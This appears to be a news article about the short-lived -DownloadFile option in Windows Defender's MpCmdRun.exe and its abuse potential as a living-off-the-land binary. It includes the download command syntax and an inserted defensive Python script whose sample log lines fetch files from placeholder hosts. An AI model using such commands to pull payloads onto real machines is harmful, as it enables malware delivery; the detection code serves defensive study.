Windows Defender's ability to download files has now been removed

The feature for downloading files using Windows Defender was recently removed because of the risk that attackers could use it to download malware onto a computer.

Last week, Microsoft added this ability to Windows Defender for an unknown reason. Concern arose in the cybersecurity community, which thought that Microsoft would allow Defender to be abused by attackers as a LOLBin.

LOLBins, or living-off-the-land binaries, are legitimate system files that could be abused for malicious purposes. The TA505 APT group, ransomware attacks, and other malware attacks have used Windows binaries this way in the past, and hence the attack is not theoretical.

Users could simply download a file by running the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) with the -DownloadFile argument, as shown below:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

This way, users could download any file, including ransomware. An activated Windows Defender would quickly detect this malware, but other security software that may allow Windows programs to bypass detection might not detect this download.
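For defenders who want to know whether this argument was used on their hosts, the following added example (not from the original article or from Microsoft) scans process-creation command lines for MpCmdRun.exe run with -DownloadFile and extracts the URL and destination path. The sample log lines are constructed, the function names are hypothetical, and it assumes arguments should be matched case-insensitively and that an executable path containing spaces is quoted.

```python
import ntpath
import re

# Constructed process-creation command lines, in the form a process-creation
# log would record them. The URLs and paths are made up for illustration.
SAMPLE_EVENTS = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    r'MpCmdRun.exe -DownloadFile -url https://files.example.test/a.bin -path C:\Users\Public\a.bin',
    r'"C:\Program Files\Windows Defender\mpcmdrun.exe" -downloadfile -URL http://203.0.113.7/x -PATH "C:\Temp\my file.exe"',
    r'cmd.exe /c echo MpCmdRun.exe -DownloadFile',
]

# A token is either a double-quoted string or a run of non-space characters.
TOKEN = re.compile(r'"[^"]*"|\S+')


def parse_download(cmdline):
    """Return {'url': ..., 'path': ...} if the command line starts MpCmdRun.exe
    with -DownloadFile, otherwise None."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    # Only the launched image (first token) counts; a mention of the binary
    # in another program's arguments is not an execution of it.
    if not tokens or ntpath.basename(tokens[0]).lower() != "mpcmdrun.exe":
        return None
    flags = [t.lower() for t in tokens[1:]]  # assumption: case-insensitive match
    if "-downloadfile" not in flags:
        return None
    found = {"url": None, "path": None}
    for i, flag in enumerate(flags):
        if flag in ("-url", "-path") and i + 1 < len(flags):
            found[flag[1:]] = tokens[i + 2]  # value follows the flag
    return found


def find_downloads(events):
    """Return (command line, details) pairs for every matching event."""
    hits = []
    for event in events:
        details = parse_download(event)
        if details is not None:
            hits.append((event, details))
    return hits


if __name__ == "__main__":
    for event, details in find_downloads(SAMPLE_EVENTS):
        print(f"ALERT url={details['url']} path={details['path']}")
```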

When we asked Microsoft why this feature was added, we got the answer, “Microsoft has nothing further to share.”

Windows Defender Antimalware Client version 4.18.2009.2-0 was released yesterday with notable changes to MpCmdRun.exe. This time, the company removed the ability to download files via the MpCmdRun.exe command-line utility. A “CmdTool: Invalid command line argument” error is now shown when users attempt to download a file using MpCmdRun.exe.

Removing this feature is a good step: there is no need to give threat actors a platform to distribute their malware and compromise our systems.